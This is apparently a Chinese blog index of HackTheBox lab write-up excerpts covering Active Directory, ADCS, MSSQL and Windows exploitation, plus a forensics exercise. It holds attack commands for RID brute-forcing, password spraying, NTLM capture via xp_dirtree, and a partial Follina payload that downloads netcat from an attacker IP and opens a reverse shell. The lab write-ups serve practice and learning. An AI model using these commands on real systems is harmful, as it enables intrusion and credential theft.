HTB-M-SolarLab
HTB-M-SolarLab 账户名的模糊猜测 PeportLab的CVE复现 Openfire脚本中提取账号密码 扫一扫 试探smb 可以用来打RID 1netexec smb 10.10.11.16 -u guest -p '' --rid-brute 然后就是 下载xlsx文件 1netexec smb solarlab.htb -u u.txt -p...
HTB-M-Pov
HTB-M-Pov讲的是 根据 web.config 中的文件泄露,构造发送这恶意 viewstate,来执行命令 一个账号密码文件泄露 SeDebugPirvilege的提权(就是有进程迁移进入系统权限 子域名爆破1ffuf -u http://10.10.11.251 -H 'HOST: FUZZ.pov.htb' -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -mc all -ac 爆破文件 1./gobuster -t 15 --delay 100ms dir -e -u "http://dev.pov.htb/portfolio" -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x...
HTB-M-Outdated
HTB-M-Outdated讲的是一个CVE的钓鱼,还有一个WSUS的提权+AddKeyCredentialLink的横移 扫端口, smb匿名登录存在文件泄露pdf文件中存在在邮箱账户,以及几个CVE需要修补的 然后利用 存在RID但是我没有进行后续的信息收集,钓鱼攻击CVE-2022-30190编写脚本12345678910111213141516171819202122#!/usr/bin/env python3import base64import randomimport stringimport sysif len(sys.argv) > 1: command = sys.argv[1]else: command = "IWR http://10.10.16.14/nc64.exe -outfile C:\\programdata\\nc64.exe; C:\\programdata\\nc64.exe 10.10.16.14 443 -e cmd"base64_payload =...
HTB-M-Manager
HTB-M-Manager RID攻击 ADCS提权 扫扫先扫一波,有web服务就去看看 测试一下功能点 貌似没xss 扫扫ldap端口,没有连接不让扫 扫扫smb 这种需要身份验证,但是假用户也能得到部分验证 可以尝试 RID 循环攻击1impacket-lookupsid dll@manager.htb -no-pass 输出中 : 前的数字是 RID 直接提取用户 1| grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tr '[:upper:]' '[:lower:]' | tee users 可以以使用netexec1netexec smb 10.10.11.236 -u guest -p '' --rid-brute 之后测试一下那个有没有用户名账号密码一样的 1netexec smb manager.htb -u users -p users --continue-on-success...
HTB-M-Jab
HTB-Jab扫描端口服务利用 XMPP - 5269, 5270(tcp下载客户端 XMPP 是一个“通用消息标准”。它允许“XMPP 兼容的软件加入 XMPP 消息网络” 先创建,新建一个用户,使用,在利用插件Service Discovery 来进行那个信息收集 可以看到还有三个子域名 然后点击list的用户的查找用户这,顺便开启插件控制台 123456789<iq type='set' from='ddl1@jab.htb' to='search.jab.htb' id='search4users' xml:lang='en'> <query xmlns='jabber:iq:search'> ...
HTB-M-Escape
HTB-M-Escape讲的是ADCS-ESC1+MSSQL数据库引起的ntlm窃取+smb信息泄露 信息收集dns没搜集到有用信息 1dig any sequel.htb smb试试存在RID,收集用户信息作为保存 smb空密码连接有文件 pdf里有个数据库的账户密码,还有几个内部人员姓名 进入数据库查询一下 1SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'spt_fallback_db'; 1SELECT TOP 10 * FROM spt_fallback_db; 没查询到有用信息,也没权限命令执行,于是采用中间人攻击 在开启python3 Responder.py -I tun0 然后用数据库 读取我主机的共享文件 1EXEC xp_dirtree '\\10.10.16.14\share', 1,...
HTB-M-Aero
HTB-M-AeroCVE-2023-28252+win11主题漏洞 显示win11的 如果是用Windows打的话 https://github.com/exploits-forsale/themebleed/releases/tag/v1 这还有Linux版本 https://github.com/Jnnshschl/CVE-2023-38146/tree/main 这个是themebleed.exe的python版本 12345python themebleed.py -r 10.10.16.14 -p 4444执行生成+监听rlwrap -cAr nc -lvnp 4444美化shell监听 获得第一个shell 123tree /f .用来查看文件 CVE-2023-28252https://github.com/duck-sec/CVE-2023-28252-Compiled-exe msf生成个反弹shell —-rev.exe 12345wget...
HTB-M-Administrator
HTB-Administrator 开局败给个账户 GenericAll权限改别人密码 smb文件藏密码 ADCS提权 一 用Linux打GenericAll apt install -y heimdal-clients libsasl2-modules-gssapi-heimdal vim ./custom_krb5.conf 123456789101112131415[libdefaults] default_realm = ADMINISTRATOR.HTB dns_lookup_realm = true dns_lookup_kdc = true[realms] ADMINISTRATOR.HTB = { kdc = dc.administrator.htb admin_server = dc.administrator.htb default_domain = dc.administrator.htb }[domain_realm] ...
HTB-H-Blazorized
HTB-Blazorized提出疑问 js抓取然后获得dll这边的手法我这残缺,我正常bp抓包的没有抓取到这个dll的调用 jwt这个参数说是用Blazor Traffic Processor工具来分析这个raw,这个raw我翻遍了我的bp我也没有找到 正常步骤 显示爆破了一下子域名,出admin,然后↓这个出现api子域名的调用,写入hosts 广告然后再点击一下check,浏览了一下发现有不错的广告资料,copy一份 Title: Active Directory Below are links to projects and posts relating AD...
2025palu应急响应主线.md
2025palu应急响应主线 1-提交堡垒机中留下的flag最开始我以为这个堡垒机应该是waf机子,因为他这个分布图是在waf挨着互联网出口,后来发现是jump机子做跳板机(堡垒机),也不能这么说,他这整个网络都是外网段的 ss -tuln 80端口开启着服务 算了,账号密码给了,登录就送 2-waf中的flag雷池waf 3-数据库中的flag 数据库开着,但是没mysql 4-提交攻击者的攻击IP/var/log/auth.log 解压.2的gz文件然后就能看到 5-攻击者最早攻击时间 6-web服务泄露的关键文件名 7-泄露的邮箱地址 8-攻击者新立足点waf85页能看到攻击者使用的IP开始切换了 9-攻击者提权用户 可以看到后门用户,那么就john,我这不太好使,john缺模块 10-提交攻击者留下的的文件内容作为flag提交 11-提交权限维持方法服务的名称ssh机子存在服务开机自启一个文件 systemctl status rootset.service 12-...